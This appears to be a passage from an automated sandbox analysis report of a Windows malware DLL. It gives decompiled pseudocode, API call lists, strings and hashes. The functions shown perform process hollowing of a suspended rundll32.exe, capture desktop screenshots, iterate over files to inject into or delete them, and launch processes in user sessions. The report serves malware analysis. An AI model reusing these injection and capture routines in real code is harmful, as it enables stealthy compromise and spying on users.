    • GetProcessHeap.KERNEL32(00000008,00000800), ref: 6ECA454E
    • HeapAlloc.KERNEL32(00000000), ref: 6ECA4555
    • wsprintfA.USER32 ref: 6ECA4584
    • wsprintfA.USER32 ref: 6ECA459F
    • wsprintfA.USER32 ref: 6ECA45D3
    • wsprintfA.USER32 ref: 6ECA45EC
    • wsprintfA.USER32 ref: 6ECA4619
    • wsprintfA.USER32 ref: 6ECA4632
    • wsprintfA.USER32 ref: 6ECA467F
    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000602,00CB2DA8), ref: 6ECA46F0
    • RtlZeroMemory.NTDLL(?,0000001E), ref: 6ECA4710
    • SHFileOperationA.SHELL32 ref: 6ECA4730
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA4739
    • HeapFree.KERNEL32(00000000), ref: 6ECA4740
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: wsprintf$Heap$PrivateProcessProfile$AllocFileFreeMemoryOperationStringWriteZero
    • String ID: %s "%s%s%s" %s$%s %s$%s%d%c$%s%s%c$%s%s%s$.cab$.exe$.inf$install$remove$restart$vpn
    • API String ID: 39017707-2794406546
    • Opcode ID: 154e2e81f00278b0f83d3ef015a0dfb0227bc31e8db7a8e14516005dcf432ac6
    • Instruction ID: a5f2ddaeaa61fe8555ed2c00515f5301b2c9fd519caab8675aa79596c800e84a
    • Opcode Fuzzy Hash: 154e2e81f00278b0f83d3ef015a0dfb0227bc31e8db7a8e14516005dcf432ac6
    • Instruction Fuzzy Hash: CC61A271504706AFE7149B9CCE86FAB7BB9AF85708F004508FF44AB285FA74A805CF61
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E6ECA23B0() {
    				char _v260;
    				char _v268;
    				char* _v272;
    				struct _SECURITY_ATTRIBUTES* _v276;
    				struct _SECURITY_ATTRIBUTES* _v280;
    				struct _SECURITY_ATTRIBUTES* _v284;
    				intOrPtr _v288;
    				intOrPtr _v292;
    				void* _v296;
    				char _v320;
    				struct HINSTANCE__* _v324;
    				void _v328;
    				struct HINSTANCE__* _v332;
    				char _v336;
    				long _v340;
    				char _v344;
    				CHAR* _t42;
    				int _t50;
    				long _t51;
    				char* _t53;
    				char* _t54;
    				void* _t56;
    				intOrPtr _t62;
    				void* _t65;
    				void* _t73;
    				void* _t88;
    				signed int _t91;
    				void* _t92;
    				long _t96;
    				void* _t97;
    
    				_v328 = LoadLibraryA("msvcrt.dll");
    				_v324 = LoadLibraryA("user32.dll");
    				_v332 = LoadLibraryA("shlwapi.dll");
    				_t42 = GetCommandLineA();
    				_v340 = 0;
    				_t88 = E6ECAA3D0(_t42,  &_v340);
    				if(_t88 == 0) {
    					L24:
    					FreeLibrary(_v324);
    					FreeLibrary(_v332);
    					FreeLibrary(_v328);
    					ExitProcess(0);
    				}
    				if(_v340 <= 1) {
    					L23:
    					LocalFree(_t88);
    					goto L24;
    				} else {
    					_t91 = 1;
    					do {
    						_t50 = lstrcmpiA( *(_t88 + _t91 * 4), "-svcr");
    						_t51 = _v340;
    						if(_t50 != 0) {
    							goto L5;
    						}
    						_t91 = _t91 + 1;
    						if(_t91 < _t51) {
    							_t53 = StrRChrA( *(_t88 + _t91 * 4), 0, 0x5c);
    							if(_t53 == 0) {
    								break;
    							}
    							_t54 =  &(_t53[1]);
    							if(_t54 != 0 &&  *_t54 != 0) {
    								wsprintfA( &_v268, "%s%s", "pdll", _t54);
    								_t56 = OpenEventA(2, 0,  &_v260);
    								if(_t56 != 0) {
    									CloseHandle(_t56);
    									break;
    								}
    								_t73 = CreateEventA(0, 1, 0,  &_v260);
    								_t96 = 0;
    								if(_t73 != 0) {
    									_push(0x3c);
    									_push( &_v320);
    									L6ECAC2EE();
    									_v344 = 0;
    									_t62 = E6ECA2260( *(_t88 + _t91 * 4),  &_v344);
    									if(_t62 != 0) {
    										_v292 = _t62;
    										_v288 = _v344;
    										_v284 = 0;
    										_v280 = 0;
    										_v276 = 0;
    										_v272 =  *(_t88 + _t91 * 4);
    										_t92 = CreateThread(0, 0, E6ECA2340,  &_v328, 0, 0);
    										if(_t92 != 0) {
    											_t97 = E6ECA1D00(_v296, _v292, 0,  &_v332);
    											if(_v296 != 0) {
    												NtTerminateThread(_t92, 0);
    												if(_t97 == 0) {
    													E6ECA1C00( &_v336);
    												}
    											}
    											CloseHandle(_t92);
    											_t96 = 0;
    										}
    										_t65 = _v296;
    										if(_t65 != _t96) {
    											VirtualFree(_t65, _t96, 0x8000);
    										}
    									}
    								}
    								CloseHandle(_t73);
    							}
    							break;
    						}
    						L5:
    						_t91 = _t91 + 1;
    					} while (_t91 < _t51);
    					goto L23;
    				}
    			}

    0x6eca23ca
    0x6eca23d5
    0x6eca23db
    0x6eca23df
    0x6eca23eb
    0x6eca23f8
    0x6eca23ff
    0x6eca2589
    0x6eca2594
    0x6eca259b
    0x6eca25a2
    0x6eca25a6
    0x6eca25a6
    0x6eca240c
    0x6eca2582
    0x6eca2583
    0x00000000
    0x6eca2412
    0x6eca2419
    0x6eca2420
    0x6eca2429
    0x6eca242d
    0x6eca2431
    0x00000000
    0x00000000
    0x6eca2433
    0x6eca2436
    0x6eca244a
    0x6eca2452
    0x00000000
    0x00000000
    0x6eca2458
    0x6eca2459
    0x6eca2478
    0x6eca248a
    0x6eca2492
    0x6eca257b
    0x00000000
    0x6eca257b
    0x6eca24aa
    0x6eca24ac
    0x6eca24b0
    0x6eca24b6
    0x6eca24bc
    0x6eca24bd
    0x6eca24cb
    0x6eca24cf
    0x6eca24d9
    0x6eca24e8
    0x6eca24f8
    0x6eca24fc
    0x6eca2500
    0x6eca2504
    0x6eca2508
    0x6eca2512
    0x6eca2516
    0x6eca2535
    0x6eca2537
    0x6eca253c
    0x6eca2543
    0x6eca254a
    0x6eca254f
    0x6eca2543
    0x6eca2553
    0x6eca2559
    0x6eca2559
    0x6eca255b
    0x6eca2561
    0x6eca256a
    0x6eca256a
    0x6eca2561
    0x6eca24d9
    0x6eca2571
    0x6eca2577
    0x00000000
    0x6eca2459
    0x6eca2438
    0x6eca2438
    0x6eca2439
    0x00000000
    0x6eca2581

    APIs
    • LoadLibraryA.KERNEL32(msvcrt.dll), ref: 6ECA23C3
    • LoadLibraryA.KERNEL32(user32.dll), ref: 6ECA23CE
    • LoadLibraryA.KERNEL32(shlwapi.dll), ref: 6ECA23D9
    • GetCommandLineA.KERNEL32 ref: 6ECA23DF
      • Part of subcall function 6ECAA3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6ECAA3DB
      • Part of subcall function 6ECAA3D0: LocalAlloc.KERNEL32(00000040,00000004,?,?,?,00000000,?), ref: 6ECAA3F4
    • lstrcmpiA.KERNEL32(?,-svcr), ref: 6ECA2429
    • StrRChrA.SHLWAPI(?,00000000,0000005C,?,-svcr), ref: 6ECA244A
    • wsprintfA.USER32 ref: 6ECA2478
    • OpenEventA.KERNEL32(00000002,00000000,?), ref: 6ECA248A
    • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 6ECA24A4
    • RtlZeroMemory.NTDLL(?,0000003C), ref: 6ECA24BD
    • CreateThread.KERNEL32 ref: 6ECA250C
    • NtTerminateThread.NTDLL ref: 6ECA253C
    • CloseHandle.KERNEL32(00000000), ref: 6ECA2553
    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 6ECA256A
    • CloseHandle.KERNEL32(00000000), ref: 6ECA2571
    • LocalFree.KERNEL32(00000000), ref: 6ECA2583
    • FreeLibrary.KERNEL32(?), ref: 6ECA2594
    • FreeLibrary.KERNEL32(?), ref: 6ECA259B
    • FreeLibrary.KERNEL32(?), ref: 6ECA25A2
    • ExitProcess.KERNEL32 ref: 6ECA25A6
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Library$Free$Load$CloseCreateEventHandleLocalThread$AllocCommandExitLineMemoryOpenProcessTerminateVirtualZerolstrcmpilstrlenwsprintf
    • String ID: %s%s$-svcr$msvcrt.dll$pdll$shlwapi.dll$user32.dll
    • API String ID: 4122922002-3260842094
    • Opcode ID: 94b283628698a5029e3035e6e07a53176c0c7aa4a1c567745a930bf6162707d2
    • Instruction ID: 47fdb30d1f4e14c4aa3cf70e3ca497e16d856d22b4b230a52357d6c221262965
    • Opcode Fuzzy Hash: 94b283628698a5029e3035e6e07a53176c0c7aa4a1c567745a930bf6162707d2
    • Instruction Fuzzy Hash: EE516CB1904316ABD604ABADC958F5BBBE8FB85748F00490DFA5197240F770E9058BA2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 59%
    			E6ECA66E0() {
    				intOrPtr* _v140;
    				void** _v144;
    				struct tagRECT _v164;
    				long _v168;
    				struct HDC__* _v172;
    				int _v180;
    				int _v184;
    				void _v188;
    				int _v192;
    				int _v196;
    				struct tagCURSORINFO _v212;
    				struct HDC__* _v216;
    				intOrPtr _v224;
    				intOrPtr _v228;
    				struct HICON__* _v232;
    				intOrPtr _v252;
    				intOrPtr _v256;
    				void* _v264;
    				intOrPtr _v268;
    				intOrPtr _v272;
    				struct HDC__* _v288;
    				struct HDC__* _v304;
    				long _v308;
    				intOrPtr _v316;
    				struct HDC__* _v320;
    				intOrPtr _v324;
    				struct HDC__* _t61;
    				struct HDC__* _t62;
    				int _t67;
    				void* _t70;
    				int _t75;
    				intOrPtr _t91;
    				int _t99;
    				long _t101;
    				int _t103;
    				struct HWND__* _t136;
    				void* _t137;
    				int _t138;
    				struct HDC__* _t139;
    				intOrPtr _t140;
    				int _t142;
    				void* _t144;
    
    				_v168 = 0;
    				_t136 = GetDesktopWindow();
    				_v164.left = _t136;
    				_t61 = GetDC(_t136);
    				_t139 = _t61;
    				_v172 = _t139;
    				if(_t139 != 0) {
    					_t62 = CreateCompatibleDC(_t139);
    					_v188 = _t62;
    					if(_t62 != 0) {
    						_push(0x10);
    						_push( &(_v164.right));
    						L6ECAC2EE();
    						GetWindowRect(_t136,  &_v164);
    						_t103 = _v164.bottom;
    						_t67 = _v164.right;
    						_t99 = _t67;
    						_t142 = _t103;
    						_t137 = CreateCompatibleBitmap(_t139, _t67, _t103);
    						_v212.hCursor = _t137;
    						if(_t137 != 0) {
    							_t70 = SelectObject(_v212.flags, _t137);
    							if(_t70 != 0 && _t70 != 0xffffffff && BitBlt(_v216, _v184, _v180, _t99, _t142, _t139, 0, 0, 0x40cc0020) != 0) {
    								_push(0x14);
    								_push( &(_v212.hCursor));
    								L6ECAC2EE();
    								_v212.cbSize = 0x14;
    								_t75 = GetCursorInfo( &_v212);
    								if(_t75 != 0 && _v212.flags == 1) {
    									_push(0x14);
    									_push( &_v192);
    									L6ECAC2EE();
    									_t75 = GetIconInfo(_v212.cbSize,  &(_v212.ptScreenPos));
    									if(_t75 != 0) {
    										_push(0x18);
    										_push( &_v180);
    										L6ECAC2EE();
    										GetObjectA(_v192, 0x18,  &_v188);
    										_t75 = DrawIconEx(_v288, _v228 - _v256 + _v256 - _v216, _v224 - _v252 + _v252 - _v212, _v232, _v196, _v192, 0, 0, 3);
    									}
    								}
    								__imp__#12(0, 0);
    								_t138 = _t75;
    								if(_t138 != 0) {
    									_push(_t138);
    									_push(_t142);
    									_push(_t99);
    									_push( &_v264);
    									if(E6ECA6480() != 0) {
    										_push(0x48);
    										_push( &(_v164.right));
    										L6ECAC2EE();
    										_push(1);
    										_push( &_v164);
    										_push(_t138);
    										if( *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0x30))))() >= 0) {
    											_t101 = _v168;
    											if(_t101 != 0) {
    												_t144 = VirtualAlloc(0, _t101, 0x1000, 4);
    												if(_t144 != 0) {
    													_push(8);
    													_push( &_v264);
    													L6ECAC2EE();
    													_push(0);
    													asm("xorpd xmm0, xmm0");
    													asm("movlpd [esp+0x2c], xmm0");
    													_push(0);
    													_push(_v268);
    													_push(_v272);
    													_push(_t138);
    													if( *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0x14))))() < 0) {
    														L24:
    														VirtualFree(_t144, 0, 0x8000);
    													} else {
    														_t140 = 0;
    														if(_t101 == 0) {
    															L23:
    															_t139 = _v304;
    															goto L24;
    														} else {
    															while(1) {
    																_push( &_v308);
    																_push(_t101 - _t140);
    																_push(_t140 + _t144);
    																_push(_t138);
    																_v308 = 0;
    																if( *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0xc))))() < 0) {
    																	break;
    																}
    																_t91 = _v324;
    																if(_t91 != 0) {
    																	_t140 = _t140 + _t91;
    																	if(_t140 < _t101) {
    																		continue;
    																	}
    																}
    																break;
    															}
    															if(_t140 == 0) {
    																goto L23;
    															} else {
    																 *_v140 = _t140;
    																_t139 = _v320;
    																 *_v144 = _t144;
    																_v316 = 1;
    															}
    														}
    													}
    												}
    											}
    										}
    									}
    									 *((intOrPtr*)( *((intOrPtr*)( *_t138 + 8))))(_t138);
    								}
    								_t137 = _v264;
    							}
    							DeleteObject(_t137);
    						}
    						DeleteDC(_v212.flags);
    						_t136 = _v192;
    					}
    					ReleaseDC(_t136, _t139);
    					return _v172;
    				} else {
    					return _t61;
    				}
    			}

    APIs
    • GetDesktopWindow.USER32 ref: 6ECA66F0
    • GetDC.USER32 ref: 6ECA66FD
    • CreateCompatibleDC.GDI32(00000000), ref: 6ECA6717
    • RtlZeroMemory.NTDLL(?,00000010), ref: 6ECA6732
    • GetWindowRect.USER32 ref: 6ECA673D
    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 6ECA6752
    • SelectObject.GDI32(?,00000000), ref: 6ECA676C
    • BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,40CC0020), ref: 6ECA679E
    • RtlZeroMemory.NTDLL(?,00000014), ref: 6ECA67B3
    • GetCursorInfo.USER32(?,?,?,?,?,?,?,?,?,?,00000014), ref: 6ECA67C5
    • RtlZeroMemory.NTDLL(?,00000014), ref: 6ECA67E5
    • GetIconInfo.USER32(?,?), ref: 6ECA67F4
    • RtlZeroMemory.NTDLL(?,00000018), ref: 6ECA6805
    • GetObjectA.GDI32(?,00000018,?), ref: 6ECA6816
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: MemoryZero$CompatibleCreateInfoObjectWindow$BitmapCursorDesktopIconRectSelect
    • String ID:
    • API String ID: 3821519111-0
    • Opcode ID: 24d400444b096101783b36c15f8e6af4b0703542bb136e33e6b5f6babc01f6eb
    • Instruction ID: ad6c4b17c8aaf5a314158a68f20e2d7761686fd76b0e4b60e8a264edbca0e523
    • Opcode Fuzzy Hash: 24d400444b096101783b36c15f8e6af4b0703542bb136e33e6b5f6babc01f6eb
    • Instruction Fuzzy Hash: 08814275214702AFD760DFA8C984F6BBBF8ABC9B44F10491CFA5597284E770D805CB62
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 74%
    			E6ECA2750(CHAR* _a4) {
    				intOrPtr _v552;
    				struct _CONTEXT _v724;
    				struct _STARTUPINFOA _v792;
    				struct _PROCESS_INFORMATION _v808;
    				void* _v812;
    				void* _v816;
    				char _t23;
    				long* _t38;
    				CHAR* _t51;
    				void* _t52;
    				void* _t55;
    
    				_t51 = _a4;
    				_t38 = 0;
    				if(GetFileAttributesA(_t51) == 0xffffffff) {
    					return 0;
    				} else {
    					_t55 = HeapAlloc(GetProcessHeap(), 8, 0x30c);
    					if(_t55 != 0) {
    						_t23 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xcd1a50
    						wsprintfA(_t55, "\"%s%s\" %s \"%s\"", _t23, "rundll32.exe", "-svcr", _t51);
    						_push(0x44);
    						_push( &(_v792.dwX));
    						L6ECAC2EE();
    						_push(0x10);
    						_push( &(_v808.dwProcessId));
    						_v792.lpDesktop = 0x44;
    						L6ECAC2EE();
    						if(CreateProcessA(0, _t55, 0, 0, 0, 4, 0, 0,  &_v792,  &_v808) != 0) {
    							_push(_v808.hProcess);
    							_t52 = E6ECA2640();
    							if(_t52 == 0) {
    								L8:
    								_push(0);
    								_push(_v808.hProcess);
    								L6ECAC30C();
    							} else {
    								_v724 = 0x10002;
    								if(NtGetContextThread(_v808.hThread,  &_v724) < 0) {
    									goto L8;
    								} else {
    									_v552 = E6ECA23B0 - "embly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" + _t52;
    									if(NtSetContextThread(_v808,  &(_v792.hStdError)) < 0 || NtResumeThread(_v812, 0) < 0) {
    										goto L8;
    									} else {
    										_t38 = 1;
    									}
    								}
    							}
    							CloseHandle(_v812);
    							CloseHandle(_v816);
    						}
    						HeapFree(GetProcessHeap(), 0, _t55);
    					}
    					return _t38;
    				}
    			}

    APIs
    • GetFileAttributesA.KERNEL32(?), ref: 6ECA2762
    • GetProcessHeap.KERNEL32(00000008,0000030C), ref: 6ECA2780
    • HeapAlloc.KERNEL32(00000000), ref: 6ECA2783
    • wsprintfA.USER32 ref: 6ECA27AA
    • RtlZeroMemory.NTDLL(?,00000044), ref: 6ECA27BA
    • RtlZeroMemory.NTDLL ref: 6ECA27CE
    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 6ECA27E6
    • NtGetContextThread.NTDLL ref: 6ECA2819
    • NtSetContextThread.NTDLL ref: 6ECA2840
    • NtResumeThread.NTDLL ref: 6ECA284F
    • NtTerminateProcess.NTDLL(?,00000000), ref: 6ECA2866
    • CloseHandle.KERNEL32(?,00000044), ref: 6ECA2876
    • CloseHandle.KERNEL32(?), ref: 6ECA287D
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA2882
    • HeapFree.KERNEL32(00000000), ref: 6ECA2885
      • Part of subcall function 6ECA2640: RtlZeroMemory.NTDLL(?,00000008), ref: 6ECA2669
      • Part of subcall function 6ECA2640: NtCreateSection.NTDLL ref: 6ECA268B
      • Part of subcall function 6ECA2640: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 6ECA26B9
      • Part of subcall function 6ECA2640: NtMapViewOfSection.NTDLL(08000000,00000000,0000000E,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 6ECA26E2
      • Part of subcall function 6ECA2640: RtlMoveMemory.NTDLL(?,00000000,00000000), ref: 6ECA26F6
      • Part of subcall function 6ECA2640: NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 6ECA272D
      • Part of subcall function 6ECA2640: NtClose.NTDLL(?), ref: 6ECA2737
    Strings
    Similarity
    • API ID: HeapMemoryProcessSection$CloseThreadViewZero$ContextCreateHandle$AllocAttributesFileFreeMoveResumeTerminateUnmapwsprintf
    • String ID: "%s%s" %s "%s"$-svcr$D$rundll32.exe
    • API String ID: 4033018722-303510360
    • Opcode ID: d1305998a3c7e22837385199b95691ba598bdc936232b094a846228364bf56a4
    • Instruction ID: 14b5cc63c8ab6677716ac3a68f037799e69588fc8be30a74379df0341b07fd0c
    • Opcode Fuzzy Hash: d1305998a3c7e22837385199b95691ba598bdc936232b094a846228364bf56a4
    • Instruction Fuzzy Hash: 093180B22043066BD304DBEACD84EABBBADEBC5758F00491CBB1597240E674DD098B72
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E6ECA28B0(intOrPtr _a8) {
    				intOrPtr _v4;
    				char _v520;
    				char _v528;
    				struct _WIN32_FIND_DATAA _v840;
    				void* _t25;
    				intOrPtr _t36;
    				void* _t48;
    				CHAR* _t49;
    				struct _WIN32_FIND_DATAA* _t53;
    				DWORD* _t54;
    
    				_t53 =  &_v840;
    				_push(0x140);
    				_push( &_v840);
    				L6ECAC2EE();
    				_push(0x208);
    				_push( &_v528);
    				L6ECAC2EE();
    				_t49 = _t53 + wsprintfA( &(_v840.cAlternateFileName), "%s", "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD") + 0x160;
    				wsprintfA(_t49, "%s%c%s", 0x6ecad543, 0x2a, _v4);
    				_t54 =  &(_t53->nFileSizeLow);
    				_t25 = FindFirstFileA( &_v520,  &_v840);
    				_t48 = _t25;
    				 *_t49 = 0;
    				if(_t48 == 0xffffffff) {
    					return _t25;
    				} else {
    					_t36 = _a8;
    					do {
    						if(lstrcmpA( &(_v840.cFileName), ".") != 0 && lstrcmpA( &(_v840.cFileName), "..") != 0) {
    							lstrcatA( &_v520,  &(_v840.cFileName));
    							if((_v840.dwFileAttributes & 0x00000010) == 0) {
    								if(_t36 == 0) {
    									E6ECA2750( &_v520);
    									_t54 =  &(_t54[1]);
    								} else {
    									DeleteFileA( &_v520);
    								}
    							}
    						}
    						 *_t49 = 0;
    					} while (FindNextFileA(_t48,  &_v840) != 0);
    					return FindClose(_t48);
    				}
    			}

    APIs
    • RtlZeroMemory.NTDLL(00000140,00000140), ref: 6ECA28C2
    • RtlZeroMemory.NTDLL(?,00000208), ref: 6ECA28D4
    • wsprintfA.USER32 ref: 6ECA28F3
    • wsprintfA.USER32 ref: 6ECA2911
    • FindFirstFileA.KERNEL32(?,?), ref: 6ECA2923
    • lstrcmpA.KERNEL32(?,6ECAD538), ref: 6ECA2950
    • lstrcmpA.KERNEL32(?,6ECAD534), ref: 6ECA2960
    • lstrcatA.KERNEL32(?,?), ref: 6ECA2973
    • DeleteFileA.KERNEL32(?), ref: 6ECA298C
    • FindNextFileA.KERNEL32(00000000,?), ref: 6ECA29AD
    • FindClose.KERNEL32(00000000), ref: 6ECA29B8
    Strings
    Similarity
    • API ID: FileFind$MemoryZerolstrcmpwsprintf$CloseDeleteFirstNextlstrcat
    • String ID: %s%c%s
    • API String ID: 1322953341-2756932909
    • Opcode ID: fd6c056e8b8b5714e2d55e3ab04820b8408e5750a9c58a33726182c93f7ef66e
    • Instruction ID: a650d012f7e5fd19e59010cbddf2a6427280cdbe57149c37b496ac4c58c10eaf
    • Opcode Fuzzy Hash: fd6c056e8b8b5714e2d55e3ab04820b8408e5750a9c58a33726182c93f7ef66e
    • Instruction Fuzzy Hash: 3C217F72104346ABD724EAE9CC54EEFBBBCAB89718F04491CFB9587140F77091098B62
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 69%
    			E6ECA3610(intOrPtr _a8) {
    				WCHAR* _v24;
    				struct _STARTUPINFOW _v96;
    				struct _PROCESS_INFORMATION _v112;
    				long _v116;
    				void* _v120;
    				void* _t19;
    				void* _t26;
    				WCHAR* _t29;
    				void* _t37;
    				intOrPtr _t38;
    
    				_push(_a8);
    				_t19 = E6ECA34B0();
    				_t37 = _t19;
    				_t38 = 0;
    				if(_t37 != 0) {
    					_push(0);
    					_push(_t37);
    					_push( &(_v96.lpReserved));
    					_v96.lpDesktop = 0x20;
    					_v96.lpReserved = 0;
    					L6ECAC37E();
    					if(_t19 != 0) {
    						_v112.dwThreadId = 0x420;
    					}
    					_push(0x44);
    					_push( &(_v96.dwX));
    					L6ECAC2EE();
    					_push(0x10);
    					_push( &(_v112.dwProcessId));
    					_v96.lpDesktop = 0x44;
    					_v96.dwX = L"Winsta0\\Default";
    					L6ECAC2EE();
    					_t29 = _v24;
    					while(CreateProcessAsUserW(_t37, 0, _t29, 0, 0, 0, _v116, _v120, 0,  &_v96,  &_v112) == 0) {
    						Sleep(0x1f4);
    						_t38 = _t38 + 1;
    						if(_t38 < 0x78) {
    							continue;
    						}
    						L8:
    						_t26 = _v120;
    						if(_t26 != 0) {
    							_push(_t26);
    							L6ECAC378();
    						}
    						return CloseHandle(_t37);
    					}
    					CloseHandle(_v112.hThread);
    					CloseHandle(_v112);
    					goto L8;
    				}
    				return _t19;
    			}

    APIs
      • Part of subcall function 6ECA34B0: WTSEnumerateSessionsA.WTSAPI32(00000000,00000000,00000001,?,?,00000000,76D24F20,00000000,?,?,00000000,76D24F20), ref: 6ECA34DE
      • Part of subcall function 6ECA34B0: WTSFreeMemory.WTSAPI32(?,00000000,?,00000008,?,?,00000000,76D24F20,00000000,?,?,00000000,76D24F20), ref: 6ECA353C
      • Part of subcall function 6ECA34B0: Sleep.KERNEL32(000001F4,00000000,?,00000008,?,?,00000000,76D24F20,00000000,?,?,00000000,76D24F20), ref: 6ECA354C
    • CreateEnvironmentBlock.USERENV ref: 6ECA3641
    • RtlZeroMemory.NTDLL(?,00000044), ref: 6ECA365B
    • RtlZeroMemory.NTDLL ref: 6ECA3677
    • CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000020,?,00000000,?,00000020,?,?,?,00000010,?), ref: 6ECA36A6
    • Sleep.KERNEL32(000001F4,?,?,?,00000010,?,00000044,00000000), ref: 6ECA36B1
    • CloseHandle.KERNEL32(?,?,?,?,00000010,?,00000044,00000000), ref: 6ECA36D0
    • CloseHandle.KERNEL32(00000020,?,?,?,00000010,?,00000044,00000000), ref: 6ECA36D7
